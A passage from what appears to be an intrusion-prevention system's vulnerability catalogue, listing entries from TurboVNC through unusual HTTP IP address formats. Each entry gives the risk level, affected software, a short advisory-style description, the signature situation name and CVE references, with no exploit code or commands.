RFB_CS-TurboVNC-Fence-Message-Stack-Based-Buffer-Overflow

References:

CVE-2019-15683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15683

Turla-Backdoor

About this vulnerability:	Turla backdoor
Risk:	High
First detected in:	sgpkg-ips-1695-5242
Last changed:	sgpkg-ips-1695-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Turla threat group backdoors such as TinyTurla.
Situation:	HTTP_CS-TinyTurla-NG-Backdoor-Traffic

TVT-NVMS-1000-Directory-Traversal

About this vulnerability:

A vulnerability in TVT NVMS-1000

Risk:

High

First detected in:

sgpkg-ips-1219-5242

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

TVT Surveillance

Type:

Input Validation

Description:

There exists a vulnerability in TVT network surveillance management software-1000, version 3.4.1, which allows remote attackers to access restricted directories due to insufficient validation of user input.

References:

CVE-2019-20085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085

TWiki-And-Foswiki-MAKETEXT-Remote-Command-Execution

About this vulnerability:

A TWiki And Foswiki MAKETEXT Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-707-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TWiki; Foswiki

Type:

Input Validation

Description:

A vulnerability in Foswiki versions 1.0.x through 1.0.10 and 1.1.x through 1.1.6, and TWiki versions before 5.1.3, which allows remote attackers to execute arbitrary commands through the MAKETEXT variable, due to the _compile function in Maketext.pm not properly handling backslashes and fully qualified method names during compilation of bracket notation.

Situation:

HTTP_CRL-TWiki-And-Foswiki-MAKETEXT-Remote-Command-Execution

References:

CVE-2012-6329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329

BID-56950
http://www.securityfocus.com/bid/56950

OSVDB-88460
http://www.osvdb.org/88460

TWiki-Remote-Perl-Code-Execution

About this vulnerability:

A TWiki Remote Perl Code Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TWiki

Type:

Perl Injection

Description:

A vulnerability in the debug functionality of TWiki, versions 4.0.x - 6.0.0, which allows remote attackers to execute Perl code through the debugenableplugins parameter.

Situation:

HTTP_CRL-TWiki-Remote-Perl-Code-Execution

References:

CVE-2014-7236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236

OSVDB-112977
http://www.osvdb.org/112977

TWiki-Search-Function-Command-Execution-Vulnerability

About this vulnerability:

Arbitrary command execution vulnerability in TWiki search function

Risk:

High

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TWiki

Type:

Malfunction

Description:

The web-based collaboration platform TWiki could allow a remote attacker to execute arbitrary commands, caused by improper filtering of shell metacharacters in the search.pm file. A remote attacker could send a specially-crafted HTTP request to execute arbitrary commands on the system with privileges of the TWiki process.

Situation:

HTTP_CRL-TWiki-Search-Function-Command-Execution-Vulnerability

References:

CVE-2004-1037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1037

BID-11674
http://www.securityfocus.com/bid/11674

OSVDB-11714
http://www.osvdb.org/11714

Twister-Music-File-Search-And-Download-Tool

About this vulnerability:	Twister
Risk:	Low
First detected in:	sgpkg-ips-203-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Twister
Type:	Peer-to-Peer
Description:	Twister is considered unwanted software by some organizations. This product is used to search and download music files, such as mp3. It also installs AdVantage adware.
Situation:	HTTP_CRL-Twister-IP-Update HTTP_CRL-Twister-Search

Twitter-TwitterServer-Histogramqueryhandler-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Twitter TwitterServer

Risk:

High

First detected in:

sgpkg-ips-1318-5242

Last changed:

sgpkg-ips-1318-5242

Platform:

Generic

Software:

TwitterServer

Type:

Input Validation

Description:

A reflected XSS vulnerability has been reported in twitter-server. This vulnerability is due to insufficient validation on user supplied input in the HistogramQueryHandler class. A remote attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation results in the execution of arbitrary script code in the security context of the target user's browser

Situation:

HTTP_CRL-Twitter-TwitterServer-Histogramqueryhandler-Cross-Site-Scripting

References:

CVE-2020-35774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35774

TYPO3-CMS-Phar-Insecure-Deserialization

About this vulnerability:	A vulnerability in TYPO3
Risk:	Moderate
First detected in:	sgpkg-ips-1137-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	TYPO3
Type:	Input Validation
Description:	An insecure deserialization vulnerability has been reported in TYPO3 CMS. This vulnerability is due to insufficient validation of serialized metadata within Phar files prior to calling a file operation such as fopen, file_exists or file_get_contents. A remote attacker can exploit this vulnerability by uploading a specially crafted Phar file to the target server. Successful exploitation will result in arbitrary code execution within the security context of the user running TYPO3 CMS (e.g: www-data).
Situation:	HTTP_CRL-TYPO3-CMS-Phar-Insecure-Deserialization

TYPO3-CMS-Sanitizelocalurl-Cross-Site-Scripting

About this vulnerability:

A vulnerability in TYPO3

Risk:

Moderate

First detected in:

sgpkg-ips-691-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TYPO3

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Typo3 CMS. The vulnerability is due to the sanitizeLocalUrl function incorrectly validating the returnUrl and redirect_url HTTP request parameters. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted link. Successful exploitation will result in the attacker-controlled script code being executed in the target user's browser in the context of the affected site.

Situation:

HTTP_CRL-TYPO3-CMS-Sanitizelocalurl-Cross-Site-Scripting

References:

CVE-2015-5956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5956

TYPO3-File-Disclosure

About this vulnerability:

A TYPO3 File Disclosure vulnerability.

Risk:

High

First detected in:

sgpkg-ips-726-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TYPO3

Type:

Insecure Configuration

Description:

A vulnerability in Typo3, multiple versions, where class.tslib_fe.php leaks a hash secret in an error message, which allows remote attackers to include the hash in a request and read arbitrary files.

Situation:

HTTP_CSU_TYPO3-File-Disclosure

References:

CVE-2009-0815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0815

OSVDB-52048
http://www.osvdb.org/52048

TYPO3-Lux-Extension-SQL-Injection

About this vulnerability:

A vulnerability in TYPO3

Risk:

Moderate

First detected in:

sgpkg-ips-1504-5242

Last changed:

sgpkg-ips-1504-5242

Platform:

Generic

Software:

TYPO3

Type:

Input Validation

Description:

Improper validation of user input causes an SQL injection vulnerability in the Lux extension for TYPO3. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CS-TYPO3-Lux-Extension-SQL-Injection
HTTP_CRL-TYPO3-Lux-Extension-SQL-Injection

References:

CVE-2022-35628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35628

Ubiquiti-Networks-AirOS-Directory-Traversal

About this vulnerability:	A vulnerability in Ubiquiti Networks AirOS
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Ubiquiti Networks AirOS
Type:	Malfunction
Description:	There is a directory traversal vulnerability in the Ubiquiti Networks AirOS.
Situation:	HTTP_CS-Ubiquiti-Networks-AirOS-Directory-Traversal

Ubiquiti-Networks-AirOS-Remote-Command-Execution-CVE-2010-5330

About this vulnerability:

A vulnerability in Ubiquiti Networks AirOS

Risk:

High

First detected in:

sgpkg-ips-1473-5242

Last changed:

sgpkg-ips-1473-5242

Platform:

Generic

Software:

Ubiquiti Networks AirOS

Type:

Input Validation

Description:

There exists a remote command execution vulnerability in the Ubiquiti Networks AirOS.

Situation:

HTTP_CSU-Ubiquiti-Networks-AirOS-Remote-Command-Execution-CVE-2010-5330

References:

CVE-2010-5330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5330

Ubisoft-Uplay-Arbitrary-Code-Execution

About this vulnerability:

A Ubisoft Uplay Arbitrary Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ubisoft Uplay

Type:

Insecure Configuration

Description:

A vulnerability in Ubisoft Uplay, versions before 2.0.4, which allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.

Situation:

File-Text_Ubisoft-Uplay-Arbitrary-Code-Execution

References:

CVE-2012-4177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4177

OSVDB-84402
http://www.osvdb.org/84402

UDP-Ethereal-IAPP-BOF

About this vulnerability:

Buffer overflow vulnerability in Ethereal IAPP dissector

Risk:

Moderate

First detected in:

sgpkg-ips-26-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ethereal

Type:

Buffer Overflow

Description:

Ethereal is a network packet capturing utility. A buffer overflow vulnerability in the Ethereal IAPP dissector allows remote attacker to crash the software when the IAPP dissector processes live network traffic or a traffic dump.

Situation:

Generic_Ethereal-IAPP-BOF

References:

CVE-2005-0739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0739

BID-12762
http://www.securityfocus.com/bid/12762

UDP-MAPI-Microsoft-Exchange-Server-DOS

About this vulnerability:

Buffer overflow in Microsoft Exchange while processing malformed MAPI commands

Risk:

High

First detected in:

sgpkg-ips-205-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server 2000; Exchange Server 2003

Type:

Buffer Overflow

Description:

Situation:

Generic_UDP-MAPI-Microsoft-Exchange-Server-MS09-003-DOS

References:

CVE-2009-0099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0099

OSVDB-51838
http://www.osvdb.org/51838

MS09-003
http://technet.microsoft.com/security/bulletin/MS09-003

uftpd-FTP-Server-Port-Command-Handling-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in uftpd Project uftpd

Risk:

Moderate

First detected in:

sgpkg-ips-1237-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

uftpd

Type:

Buffer Overflow

Description:

There has been reported a stack-based buffer overflow vulnerability in uftpd FTP server. Successful exploitation could lead in arbitrary code execution.

Situation:

FTP_CS-uftpd-FTP-Server-Port-Command-Handling-Stack-Buffer-Overflow

References:

CVE-2020-5204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5204

Ultra-Mini-Httpd-Stack-Based-Buffer-Overflow

About this vulnerability:

A stack based buffer overflow vulnerability in Ultra Mini Httpd

Risk:

High

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ultra Mini HTTPD

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Ultra Mini HTTPD 1.21 that allows remote attackers to execute arbitrary code via a long resource name in an HTTP request.

Situation:

HTTP_CRL-Ultra-Mini-Httpd-Stack-Based-Buffer-Overflow

References:

CVE-2013-5019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5019

BID-61130
http://www.securityfocus.com/bid/61130

OSVDB-95164
http://www.osvdb.org/95164

Ultra-Office-Control-ActiveX-Control-Stack-Based-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Ultra Office Control ActiveX control.

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ultra Office Control

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Ultra Office Control, version 2.0.2008.501, which allows remote attackers to execute arbitrary code via a long strUrl, strFile, or strPostData parameter in the HttpUpload method.

Situation:

File-Text_Ultra-Office-Control-ActiveX-Control-Stack-Based-Buffer-Overflow

References:

CVE-2008-3878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3878

BID-30861
http://www.securityfocus.com/bid/30861

OSVDB-47866
http://www.osvdb.org/47866

UltraVNC-Authenticate-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in UltraVNC

Risk:

High

First detected in:

sgpkg-ips-206-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

UltraVNC

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in UltraVNC. The application does not have sufficient validation of incoming network messages. A remote attacker might trigger this vulnerability by persuading the target user to connect to a malicious VNC server. Successful exploitation may lead to arbitrary code execution in the context of the current user.

Situation:

RFB_SS-UltraVNC-Authenticate-Buffer-Overflow

References:

CVE-2009-0388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0388

BID-33568
http://www.securityfocus.com/bid/33568

UltraVNC-Client-Buffer-Overflow

About this vulnerability:

An UltraVNC Client Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

UltraVNC

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in UltraVNC versions 1.0.2 and 1.0.4 before 01252008, which allows remote attackers to execute arbitrary code via a modified size value.

Situation:

Generic_SS-UltraVNC-Client-Buffer-Overflow

References:

CVE-2008-0610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0610

BID-27561
http://www.securityfocus.com/bid/27561

OSVDB-42840
http://www.osvdb.org/42840

UltraVNC-File-Transfer-Request-Handler-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in UltraVNC Project UltraVNC

Risk:

Moderate

First detected in:

sgpkg-ips-1151-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

UltraVNC

Type:

Buffer Overflow

Description:

Improper handling of file transfer requests from a client causes a stack-besed buffer overflow vulnerability in the UltraVNC server. A successful exploit causes a denial of service condition.

Situation:

Generic_CS-UltraVNC-File-Transfer-Request-Handler-Stack-Based-Buffer-Overflow

References:

CVE-2019-8276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8276

UltraVNC-VNC-Server-File-Transfer-Offer-Handler-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in UltraVNC Project UltraVNC

Risk:

Moderate

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

UltraVNC

Type:

Buffer Overflow

Description:

Improper handling of file transfer offer requests from clients causes a heap-based buffer overflow vulnerability in UltraVNC. A successful exploit allows an attacker to execure arbitrary code on the target system.

Situation:

Generic_CS-UltraVNC-VNC-Server-File-Transfer-Offer-Handler-Heap-Based-Buffer-Overflow

References:

CVE-2019-8274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8274

UltraVNC-Vnclog-Buffer-Overflow

About this vulnerability:

A vulnerability in UltraVNC Project UltraVNC

Risk:

High

First detected in:

sgpkg-ips-357-4219

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

UltraVNC

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the UltraVNC server. The vulnerability is caused by improper validation of user supplied requests sent to the affected component. A successful attack can result in the termination of the UltraVNC service. In a situation where the malicious user is successful in injecting and executing supplied code, the behaviour of the target system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the user that launched the UltraVNC server application, though it may be SYSTEM, as the application has the option of running as a service. If the case of unsuccessful code injection, the UltraVNC application will terminate, causing denial of service.

Situation:

HTTP_CSU-UltraVNC-Vnclog-Buffer-Overflow

References:

CVE-2006-1652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1652

BID-17378
http://www.securityfocus.com/bid/17378

Umbraco-CMS-File-Upload-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Umbraco CMS

Risk:

Moderate

First detected in:

sgpkg-ips-1334-5242

Last changed:

sgpkg-ips-1334-5242

Platform:

Generic

Software:

Umbraco CMS

Type:

Input Validation

Description:

There exists a stored cross-site scripting vulnerability in the Umbraco CMS. Successful exploitation could lead in arbitrary script execution.

Situation:

HTTP_CS-Umbraco-CMS-File-Upload-Stored-Cross-Site-Scripting

References:

CVE-2020-5810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5810

Umplayer-Wintab32.dll-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Ori Rejwan UMPlayer

Risk:

Moderate

First detected in:

sgpkg-ips-494-5211

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

UMPlayer

Type:

Malfunction

Description:

A code execution vulnerability has been identified in Ori Rejwan UMPlayer. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to open a media file from a directory, which also contains a malicious DLL. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016

References:

BID-56354
http://www.securityfocus.com/bid/56354

Un4seen-XMPlay-Stack-Based-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Un4seen XMPlay.

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Un4seen

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Un4seen XMPlay, versions 3.3.0.5 and earlier, which allows remote attackers to execute arbitrary code via a M3U file containing a long FileName, or cause a crash using a long DisplayName.

Situation:

File-TextId_Un4seen-XMPlay-Stack-Based-Buffer-Overflow

References:

CVE-2006-6063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6063

BID-21206
http://www.securityfocus.com/bid/21206

OSVDB-30537
http://www.osvdb.org/30537

Unauthenticated-RCE-In-Bricks-Builder-Theme

About this vulnerability:

An attempt to exploit a vulnerability in the Bricks Builder Theme for WordPress detected

Risk:

High

First detected in:

sgpkg-ips-1715-5242

Last changed:

sgpkg-ips-1715-5242

Platform:

Windows; Unix; Linux

Software:

WordPress Bricks Builder Theme

Type:

Input Validation

Description:

A vulnerability in the Bricks Builder Theme for WordPress, versions 1.9.6 before, which allows remote attackers to bypass authentication by use of a nonce, and exploit arbitrary code by use of the eval() function usage within the theme.

Situation:

HTTP_CRL-Unauthenticated-RCE-In-Bricks-Builder-Theme

References:

CVE-2024-25600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600

Unauthenticated-RCE-In-NetAlertX

About this vulnerability:

A vulnerability in NetAlertX

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Linux

Software:

NetAlertX

Type:

Insecure Configuration

Description:

A vulnerability in NetAlertX, versions prior to v24.10.12, which allows remote attackers to execute arbitrary commands on a target system by bypassing the setting.php page where authentication is performed.

Situation:

HTTP_CS-Unauthenticated-RCE-In-NetAlertX

References:

CVE-2024-46506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46506

Unauthenticated-Remote-Code-Execution-In-Ignition

About this vulnerability:

A vulnerability in Ignition Laravel.

Risk:

High

First detected in:

sgpkg-ips-1437-5242

Last changed:

sgpkg-ips-1437-5242

Platform:

Unix;Windows

Software:

Ignition Laravel

Type:

Input Validation

Description:

A vulnerability in Ignition Laravel, versions Ignition before 2.5.2, Laravel before 8.4.2, which allow remote attackers to execute arbitrary code by uploading a malicious log file, due to the insecure usage of file_get_contents() and file_put_contents().

Situation:

HTTP_CRL-Unauthenticated-Remote-Code-Execution-In-Ignition

References:

CVE-2021-3129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129

Unicode-Formatting-Control-Characters

About this vulnerability:	Unicode formatting control character handling
Risk:	High
First detected in:	sgpkg-ips-600-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Malfunction
Description:	The Unicode character set contains a number of control characters that affect order how characters are displayed. For example Left-to-Right Override character (RLO) can be used to force to reverse the display order of the characters, and it can be used to spoof the executable extension from the file name.
Situation:	HTTP_CSU-Unicode-RLO-Character HTTP_CSU-Unicode-LRO-Character

Unify-Ewave-Servletexec-Upload

About this vulnerability:

Unify eWave ServletExec upload

Risk:

High

First detected in:

sgpkg-ips-137-2032

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

eWave ServletExec

Type:

Insecure Configuration

Description:

This servlet application provides file uploading and execution features. Access to these features is unrestricted, so the attacker may gain access to the system simply by uploading malicious code and executing it.

References:

CVE-2000-1024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1024

BID-1876
http://www.securityfocus.com/bid/1876

Unisys-Business-Information-Server-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Unisys Business Information Server

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Unisys Business Information Server

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Unisys Business Information Server. The flaw is due to a boundary error when processing crafted packets sent to the server. Successful attack may result in code execution in the context of the affected service.

Situation:

Generic_CS-Unisys-Business-Information-Server-Stack-Buffer-Overflow

References:

CVE-2009-1628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1628

BID-35494
http://www.securityfocus.com/bid/35494

Unitrends-UEB-api/storage-Remote-Root

About this vulnerability:

A Unitrends UEB api/storage Remote Root vulnerability

Risk:

High

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Unitrends

Type:

Input Validation

Description:

A vulnerability in Unitrends UEB, versions before 10.0.0, which allows remote attackers to bypass authentication and execute arbitrary commands with root privileges, due to inusfficient input validation.

Situation:

HTTP_CRL-Unitrends-UEB-api/storage-Remote-Root

References:

CVE-2017-12478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12478

Unitrends-UEB-bpserverd-Authentication-Bypass

About this vulnerability:

A Unitrends UEB bpserverd Authentication Bypass vulnerability

Risk:

High

First detected in:

sgpkg-ips-1029-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Unitrends

Type:

Input Validation

Description:

A vulnerability in Unitrends, versions before 10.0.0, which allows remote attackers to bypass authentication due to improper input validation.

Situation:

Generic_CS-Unitrends-UEB-bpserverd-Authentication-Bypass

References:

CVE-2017-12477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12477

Unitronics-Unidownloader-And-VisiLogic-OPLC-Ipworksssl-Memory-Corruption

About this vulnerability:

A vulnerability in Unitronics VisiLogic OPLC

Risk:

Low

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Unitronics VisiLogic OPLC; Unitronics UniDownloader

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Unitronics, VisiLogic OPLC IDE and UniDownloader. The vulnerability is due to untrusted pointer dereference on the SSLCertHandle parameter of the IPWorksSSL.HTTPS ActiveX control. A remote attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.

Situation:

File-Text_Unitronics-Unidownloader-And-VisiLogic-OPCL-Ipworksssl-Memory-Corruption

References:

CVE-2015-7905
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7905

Unitronics-VisiLogic-ActiveX-Out-Of-Bounds-Array-Indexing

About this vulnerability:

A vulnerability in Unitronics VisiLogic OPLC

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Unitronics VisiLogic OPLC

Type:

Malfunction

Description:

There exists an out of bounds array indexing vulnerability in Unitronics VisiLogic OPLC. A remote attacker can exploit this to achieve code execution on the target system.

Situation:

File-Text_Unitronics-VisiLogic-ActiveX-Out-Of-Bounds-Array-Indexing

References:

CVE-2015-6478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6478

Unitronics-VisiLogic-OPLC-ActiveX-Control-Memory-Corruption

About this vulnerability:

A vulnerability in Unitronics VisiLogic OPLC

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Unitronics VisiLogic OPLC

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Unitronics VisiLogic OPLC. A remote attacker can use this to execute code on the affected machine.

Situation:

File-Text_Unitronics-VisiLogic-OPLC-TeeCommander-ChartLink-ActiveX-Control-Memory-Corruption

References:

CVE-2015-6478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6478

Unitronics-VisiLogic-OPLC-IDE-Teepreviewer-ChartLink-Memory-Corruption

About this vulnerability:

A vulnerability in Unitronics VisiLogic OPLC

Risk:

Moderate

First detected in:

sgpkg-ips-727-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Unitronics VisiLogic OPLC

Type:

Malfunction

Description:

Unitronics VisiLogic OPLC IDE contains an ActiveX control that has a memory corruption vulnerability. A successful exploitation allows code execution with user privileges on the target machine.

Situation:

File-Text_Unitronics-VisiLogic-OPLC-IDE-Teepreviewer-ChartLink-Memory-Corruption

References:

CVE-2015-6478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6478

Unitronics-VisiLogic-OPLC-IDE-Vlp-File-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Unitronics VisiLogic OPLC

Risk:

High

First detected in:

sgpkg-ips-724-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Unitronics VisiLogic OPLC

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in Unitronics VisiLogic OPLC IDE. A remote attacker can use this to acchieve code execution on the affected machine.

Situation:

File-Zip_Unitronics-VisiLogic-OPLC-IDE-Vlp-File-Parsing-Heap-Buffer-Overflow

References:

CVE-2015-7939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7939

Universal-Plug-And-Play-Request

About this vulnerability:	Universal Plug and Play request
Risk:	Low
First detected in:	sgpkg-ips-141-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Misconfiguration
Description:	Universal Plug and Play (UPnP) is a protocol that allows an automatic remote configuration of network devices. For example, a computer in a local network can request access port redirection from the boundary router that is normally not allowed on demand. When used maliciously, it can be also used to weaken protection of the network and may allow unauthorized access to the network. Universal Plug and Play is usually enabled in network-enabled devices meant for home and small office use.
Situation:	Shared_CS-Universal-Plug-And-Play-Request

Unix-IFS-Code-Execution

About this vulnerability:	An attempt to execute code on Unix operation system
Risk:	High
First detected in:	sgpkg-ips-1213-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	<os>
Type:	Malfunction
Description:	Internal field separator (IFS) was detected in the traffic. This usually refers to an attempt to execute malicious code on the target system.
Situation:	HTTP_CRL-Unix-IFS-Code-Execution

Unix-System-Monitor-Messages

About this vulnerability:	Unix system monitor output messages
Risk:	Low
First detected in:	sgpkg-ips-660-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	<os>
Type:	Insecure Configuration
Description:	Seeing plaintext system diagnostic outputs in network traffic may indicate insecure operation of network monitors or network breaches.
Situation:	Generic_UDP-Unix-System-Monitor-Messages Generic_CS-Unix-System-Monitor-Messages

Unknown-Client-Side-Scripting-Filename

About this vulnerability:	A reference to an unknown scripting file type inside HTML
Risk:	Low
First detected in:	sgpkg-ips-661-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	HTML script tags may be used to run non-standard client side languages and to bypass origin policy protections.

Unraid-Auth-Bypass-PHP-RCE

About this vulnerability:

A vulnerability in Unraid

Risk:

High

First detected in:

sgpkg-ips-1291-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

Unraid

Type:

Input Validation

Description:

There exists a vulnerability in Unraid, version 6.8.0, which allows remote attackers to execute arbitrary code due to insufficient user input validation. This situation also covers the vulnerability CVE-2020-5849.

Situation:

HTTP_CRL-Unraid-Auth-Bypass-PHP-RCE

References:

CVE-2020-5847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847

UnrealIRCD-Backdoor-Command-Execution

About this vulnerability:

A UnrealIRCD Backdoor Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

UnrealIRCD

Type:

Backdoor

Description:

An externally introduced backdoor in UnrealIRCD version 3.2.8.1, distributed from November 2009 through June 2010, allows remote attackers to execute arbitrary commands.

Situation:

Generic_CS-UnrealIRCD-Backdoor-Command-Execution

References:

CVE-2010-2075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075

BID-40820
http://www.securityfocus.com/bid/40820

OSVDB-65445
http://www.osvdb.org/65445

Untangle-NG-Firewall-execEvil-Command-Injection

About this vulnerability:	A vulnerability in Untangle
Risk:	Moderate
First detected in:	sgpkg-ips-816-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Untangle
Type:	Malfunction
Description:	A command injection vulnerability in the Untangle firewall can be used to run arbitrary commands on the target system.
Situation:	HTTP_CRL-Untangle-NG-Firewall-execEvil-Command-Injection

Unusual-IP-Address-Format-Used-In-HTTP-Request

About this vulnerability:	An unsual IP address format used in HTTP request
Risk:	Low
First detected in:	sgpkg-ips-94-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Metacharacter
Description:	An IP address can be specified in numeric format, usually four decimal numbers separated by dots. The HTTP protocol also supports the use of other rarely used ways to specify the address, for example using octal or hexadecimal numbers. This kind of addressing is sometimes used by malware to conceal activity from the end user.
